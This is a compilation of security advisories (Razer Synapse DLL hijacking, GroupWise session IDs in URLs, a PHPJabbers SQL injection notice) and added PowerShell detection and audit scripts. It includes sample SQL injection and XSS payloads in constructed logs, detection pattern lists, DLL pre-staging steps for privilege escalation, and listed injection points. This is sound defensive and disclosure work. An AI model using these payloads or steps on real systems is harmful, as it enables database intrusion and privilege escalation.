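# Parameters reported as injectable, grouped by the script path they belong to.
$WatchList = @{
    '/index.php'   = @('index', 'p')
    '/preview.php' = @('lid', 'for', 'feature_id', 'min_bedrooms', 'max_bedrooms',
                       'min_bathrooms', 'max_bathrooms')
    '/front.php'   = @('listing_search', 'view', 'season', 'direction', 'price_from',
                       'price_to', 'pjPage', 'rating_from', 'rating_to')
}

# Indicator patterns modelled on the payload shapes in the advisories:
# error-based (GTID_SUBSET), time-based (SLEEP), boolean-based (RLIKE, "AND n=n"),
# sqlmap's "-- xxxx" comment tail, and HTML / event-handler injection for XSS.
$SqliPatterns = @(
    'GTID_SUBSET\s*\(',
    'SLEEP\s*\(',
    '\bRLIKE\b',
    '\)\s*AND\s*\(?\s*\d+\s*=\s*\d+',
    '--\s*\w*$'
)
$XssPatterns = @(
    '<\s*(img|script|svg|iframe|a)\b',
    '\bon\w+\s*=',
    'javascript\s*:'
)

function Get-QueryParameters {
    <# Split a request target into script path plus decoded name/value pairs.
       Decoding happens once, here, so the pattern checks see the real payload. #>
    param([string]$Target)
    $path, $query = $Target -split '\?', 2
    $params = @()
    foreach ($pair in ($query -split '&')) {
        if (-not $pair) { continue }
        $name, $value = $pair -split '=', 2
        $params += [pscustomobject]@{
            Name  = [uri]::UnescapeDataString($name)
            Value = [uri]::UnescapeDataString([string]$value)
        }
    }
    # Path-segment injection (/front.php/[XSS]?...) is also reported above, so
    # anything after the script name is exposed as a pseudo-parameter "<path>".
    if ($path -match '^(?<script>/[^/]+\.php)(?<extra>/.+)$') {
        $params += [pscustomobject]@{ Name = '<path>'; Value = [uri]::UnescapeDataString($Matches.extra) }
        $path = $Matches.script
    }
    [pscustomobject]@{ Path = $path; Params = $params }
}

function Test-RequestLine {
    <# Emit one finding per suspicious watched parameter; emit nothing for clean requests. #>
    param([string]$Target)
    $req = Get-QueryParameters $Target
    if (-not $WatchList.ContainsKey($req.Path)) { return }
    foreach ($p in $req.Params) {
        if ($p.Name -ne '<path>' -and $WatchList[$req.Path] -notcontains $p.Name) { continue }
        $kinds = @()
        if ($SqliPatterns | Where-Object { $p.Value -match $_ }) { $kinds += 'SQLI' }
        if ($XssPatterns  | Where-Object { $p.Value -match $_ }) { $kinds += 'XSS' }
        if ($kinds) {
            [pscustomobject]@{
                Path       = $req.Path
                Parameter  = $p.Name
                Indicators = ($kinds -join ',')
                Value      = $p.Value
            }
        }
    }
}

# Constructed sample access log (combined format; addresses and values are made up).
$SampleLog = @'
203.0.113.5 - - [29/Jan/2023:07:27:55 +0000] "GET /front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2)%20AND%20(SELECT%202396%20FROM%20(SELECT(SLEEP(5)))lmil)%20AND%20(1063=1063&rating_to=5 HTTP/1.1" 200 5120
203.0.113.5 - - [29/Jan/2023:07:28:01 +0000] "GET /preview.php?lid=%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E HTTP/1.1" 200 2048
203.0.113.5 - - [29/Jan/2023:07:28:04 +0000] "GET /front.php/%3Csvg%20onload%3Dalert(1)%3E?controller=pjListings&action=pjActionRegister&view=list HTTP/1.1" 200 2048
198.51.100.7 - - [29/Jan/2023:07:28:09 +0000] "GET /front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5 HTTP/1.1" 200 5120
'@

$findings = foreach ($line in ($SampleLog -split "`n")) {
    if ($line -match '"(?:GET|POST)\s+(?<target>\S+)\s+HTTP/') { Test-RequestLine $Matches.target }
}
$findings | Format-Table -AutoSize
```

The last sample request carries ordinary numeric values and produces no finding, which is the point of scoping the check to the reported parameters rather than pattern-matching whole lines.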
<pre><code><br />Advisory ID: SYSS-2022-047<br />Product: Razer Synapse<br />Manufacturer: Razer Inc.<br />Affected Version(s): Versions before 3.7.0830.081906<br />Tested Version(s): 3.7.0731.072516<br />Vulnerability Type: Improper Certificate Validation (CWE-295)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2022-08-02<br />Solution Date: 2022-09-06<br />Public Disclosure: 2022-12-21<br />CVE Reference: CVE-2022-47632<br />Author of Advisory: Dr. Oliver Schwarz, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Razer Synapse is additional driver software for Razer gaming devices.<br />The manufacturer describes the product as a "unified cloud-based hardware<br />configuration tool" (see [1]).<br /><br />Due to an unsafe installation path, improper privilege management, and<br />improper certificate validation, the associated system service<br />"Razer Synapse Service" is vulnerable to DLL hijacking.<br />As a result, local Windows users can abuse the Razer driver installer<br />to obtain administrative privileges on Windows.<br /><br />In order to exploit the vulnerability, the attacker needs physical<br />access to the machine and needs to prepare the attack before Razer<br />Synapse is installed along with a Razer driver.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The attack scenario considers a Windows machine without any previous<br />installation of any Razer device or software.<br />The attacker has a local unprivileged Windows account, physical access<br />to the machine, and a device which is either a Razer peripheral or able<br />to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero).<br />The attacker aims at executing code with full system privileges.<br /><br />The attack exploits the Razer Synapse Service, which runs with elevated<br />privileges. While the main binary of the service is stored in the<br />protected location "C:\Program Files (x86)\Razer\Synapse3\Service", it<br />dynamically loads libraries from<br />"C:\ProgramData\Razer\Synapse3\Service\bin".<br />Before the installation, standard users can write to this path, since<br />"C:\ProgramData" is world-writable on a standard installation of Windows.<br /><br />The Synapse installation procedure changes access privileges so that<br />standard users cannot write to the path any longer.<br />However, if the path is created before the driver installation, the<br />creator can set their own files to read-only and deny write access for<br />the SYSTEM user.<br /><br />Upon start, the Synapse service checks the location for foreign DLLs,<br />removes them, and aborts upon failure to delete them.<br />However, the DLL check only verifies whether the DLL is associated with<br />ANY certificate information. The service does not verify whether the<br />certificate is actually valid or belongs to Razer.<br /><br />Note that the described vulnerability is similar to CVE-2021-44226,<br />which has been fixed in Synapse version 3.7.0228.022817.<br />The new attack differs from the original one in that the attacker<br />now has to employ self-signed DLLs instead of non-signed ones.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The attack consists of the following steps:<br /><br />1. Before the installation of the driver/Synapse, the attacker creates<br /> "C:\ProgramData\Razer\Synapse3\Service", copies a custom/malicious<br /> and self-signed version of userenv.dll into the directory, sets the<br /> DLL to read-only, and denies write access for SYSTEM.<br /><br />2. Afterwards, the attacker triggers the installation of Synapse.<br /> This can be done without any elevated privileges by plugging in a<br /> Razer device and following the installation procedure for Synapse<br /> if device-specific co-installers are not disabled.<br /> Alternatively, a device such as a Bash Bunny or a Raspberry Pi Zero<br /> can be used to pretend to be a Razer device.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Razer has published a patched version that will be deployed automatically<br />upon driver installation on current Windows builds.<br /><br />To prevent similar attacks through other co-installers, system<br />administrators can disable them by setting the following key in the<br />Windows registry:<br /><br />HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer\DisableCoInstallers = 1<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-06-02: Vulnerability discovered<br />2022-08-02: Vulnerability reported to manufacturer<br />2022-09-06: Patch released by manufacturer<br />2022-12-21: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Razer Synapse 3<br /> https://www2.razer.com/eu-en/synapse-3<br />[2] SySS Security Advisory SYSS-2022-047<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-047.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH.<br /><br />E-Mail: oliver.schwarz@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver_Schwarz.asc<br />Key ID: 0x9716294F1294280D<br />Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
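An added audit script (not from the SySS advisory and not Razer's code) that checks the service's DLL directory the way the advisory says the service should: a DLL passes only with a signature whose chain is trusted and whose signer matches the expected publisher, not merely because some certificate information is attached. It also lists broad write access on the directory (the pre-staging condition described above) and reads the DisableCoInstallers value from the Solution section; the signer subject pattern 'CN=Razer' is an assumption.

```powershell
# Added example, not the advisory's or Razer's code: audit a service's DLL
# directory for the weakness described above. Instead of accepting any DLL
# that merely carries certificate information, require a signature whose
# chain is trusted (Status 'Valid') AND whose signer matches the expected
# publisher; a self-signed DLL has a SignerCertificate but is not 'Valid'.
# The subject pattern is an assumption; adjust it to the vendor's signing cert.
param(
    [string]$DllDir = 'C:\ProgramData\Razer\Synapse3\Service\bin',
    [string]$ExpectedSubjectPattern = 'CN=Razer'   # assumption
)

function Test-DllTrust {
    param([string]$Path, [string]$SubjectPattern)
    $sig = Get-AuthenticodeSignature -FilePath $Path
    $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
    [pscustomobject]@{
        File    = $Path
        Status  = $sig.Status      # Valid, NotSigned, NotTrusted, HashMismatch, ...
        Subject = $subject
        Trusted = ($sig.Status -eq 'Valid') -and ($subject -match $SubjectPattern)
    }
}

function Get-BroadWriteAccess {
    # ACEs granting write-type rights to broad principals (heuristic string match).
    param([string]$Path)
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference -match 'Users|Everyone|Authenticated Users' -and
        $_.FileSystemRights -match 'Write|Modify|FullControl|CreateFiles'
    }
}

if (Test-Path -Path $DllDir) {
    "DLLs in $DllDir that fail a proper publisher check:"
    Get-ChildItem -Path $DllDir -Filter '*.dll' -File |
        ForEach-Object { Test-DllTrust -Path $_.FullName -SubjectPattern $ExpectedSubjectPattern } |
        Where-Object { -not $_.Trusted } | Format-Table -AutoSize
    "Broad write access on $DllDir (pre-staging risk if this exists before install):"
    Get-BroadWriteAccess -Path $DllDir | Format-Table IdentityReference, FileSystemRights -AutoSize
} else {
    "$DllDir does not exist."
}

# Co-installer setting from the Solution section of the advisory.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer'
$val = (Get-ItemProperty -Path $key -Name DisableCoInstallers -ErrorAction SilentlyContinue).DisableCoInstallers
if ($val -eq 1) { 'DisableCoInstallers = 1: device co-installers are disabled.' } else { 'DisableCoInstallers is not 1: co-installers run during driver installation.' }
```

Run it from an elevated prompt so Get-Acl and the HKLM read succeed; the DLL listing is the check the advisory says the service itself lacked.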
<pre><code># Trovent Security Advisory 2203-01 #<br />#####################################<br /><br /><br />Micro Focus GroupWise transmits session ID in URL<br />#################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2203-01<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2203-01<br />Affected product: Micro Focus GroupWise<br />Affected version: prior to 18.4.2<br />Vendor: Micro Focus, https://www.microfocus.com<br />Credits: Trovent Security GmbH, Stefan Pietsch<br /><br /><br />Detailed description<br />####################<br /><br />Micro Focus GroupWise is messaging software for email and personal information<br />management.<br />Trovent Security GmbH discovered that the GroupWise web application transmits<br />the session ID in the URL of HTTP GET requests when email content is accessed.<br />The exposed session ID can be recorded in the browser history of the client and<br />in the log files of the web server or reverse proxy server.<br />An attacker with access to the browser history or the server log files can<br />take over the user session using the session ID.<br /><br />Severity: Medium<br />CVSS Score: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br />CVE ID: CVE-2022-38756<br />CWE ID: CWE-598<br /><br /><br />Proof of concept<br />################<br /><br />Simplified HTTP request:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />GET /attachment?session=<SESSIONID>&id=... HTTP/1.1<br />Host: <HOSTNAME><br />...<br />X-User-Agent: GroupWise Web (18.4.0-139604)<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />The vendor released a fixed version of GroupWise.<br /><br />Fixed in version 18.4.2.<br /><br /><br />History<br />#######<br /><br />2022-03-30: Vulnerability found<br />2022-08-05: Vendor contacted<br />2022-10-31: Contacted vendor again<br />2022-11-01: Vendor replied that the vulnerability will be investigated<br />2022-11-14: Vendor contacted, asking for status<br />2022-11-16: Vendor replied that a security bulletin is being prepared<br />2022-12-06: Vendor published security bulletin<br />2023-01-27: Advisory published<br /></code></pre>
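An added detection example (not from the Trovent advisory) for the exposure described above: it scans access log lines from a web server or reverse proxy for a session identifier carried in the query string, the CWE-598 condition, and emits a redacted finding so the audit does not copy the token into yet another log. The log lines are constructed for this example, and 'session' is the parameter name taken from the advisory's request.

```powershell
# Added example, not from the Trovent advisory: scan web server or reverse
# proxy access logs for session identifiers carried in the query string (the
# CWE-598 exposure described above) and emit redacted findings, so the audit
# does not copy the token into yet another log. The log lines below are
# constructed for this example; 'session' is the parameter name shown in the
# advisory's request.
$SessionParams = @('session')   # extend with other token-bearing parameter names

# Constructed sample entries in Combined Log Format (not real traffic).
$SampleLog = @'
10.0.0.5 - - [27/Jan/2023:10:01:02 +0100] "GET /attachment?session=AbCdEf123456&id=42 HTTP/1.1" 200 5120 "-" "GroupWise Web (18.4.0-139604)"
10.0.0.6 - - [27/Jan/2023:10:01:07 +0100] "GET /gw/webacc?action=Login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [27/Jan/2023:10:02:30 +0100] "GET /mail/view?id=7&session=ZzYyXx987654 HTTP/1.1" 200 3072 "-" "GroupWise Web (18.4.0-139604)"
'@

function Find-SessionInUrl {
    param([string[]]$Lines, [string[]]$ParamNames)
    $names = ($ParamNames | ForEach-Object { [regex]::Escape($_) }) -join '|'
    # Request line: method, path with query, protocol; the token is captured only so it can be redacted.
    $re = [regex]('"(?<method>[A-Z]+) (?<path>[^ "]*?[?&](?<param>' + $names + ')=(?<token>[^&" ]+)[^ "]*) HTTP/[\d.]+"')
    foreach ($line in $Lines) {
        $m = $re.Match($line)
        if (-not $m.Success) { continue }
        $token = $m.Groups['token'].Value
        $param = $m.Groups['param'].Value
        [pscustomobject]@{
            Client    = ($line -split ' ')[0]
            Method    = $m.Groups['method'].Value
            Parameter = $param
            # Keep only a short prefix so the finding itself cannot be replayed.
            Token     = $token.Substring(0, [Math]::Min(4, $token.Length)) + '...'
            Path      = $m.Groups['path'].Value -replace "([?&]$param=)[^&]+", '$1[REDACTED]'
        }
    }
}

$findings = Find-SessionInUrl -Lines ($SampleLog -split "`r?`n") -ParamNames $SessionParams
$findings | Format-Table -AutoSize
```

Against the constructed lines the first and third entries are reported and the login request is not; on real logs, replace $SampleLog with Get-Content of the access log and treat every hit as a token that must be rotated and an endpoint that should carry the session in a cookie or header instead.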
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Car Rental Script 3.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br /><br />POST parameter 'hour_from' is vulnerable to SQLI<br /><br />POST parameter 'minutes_to' is vulnerable to SQLI<br /><br />date_from=27.01.2023&hour_from=[INJECT-HERE]&minutes_from=00&date_to=28.01.2023&hour_to=09&minutes_to=[INJECT-HERE]&pickup_id=4&same_location=1<br /><br /><br />POST parameter 'col_name' is vulnerable to SQLI<br /><br />index.php?controller=pjFront&action=pjActionLoadCars&session_id=9j5lonhuljjtcpff7l1qjq5a85&type_id=all&transmission=&col_name=total_price&direction=asc<br /><br /><br />[-] Done<br /></code></pre>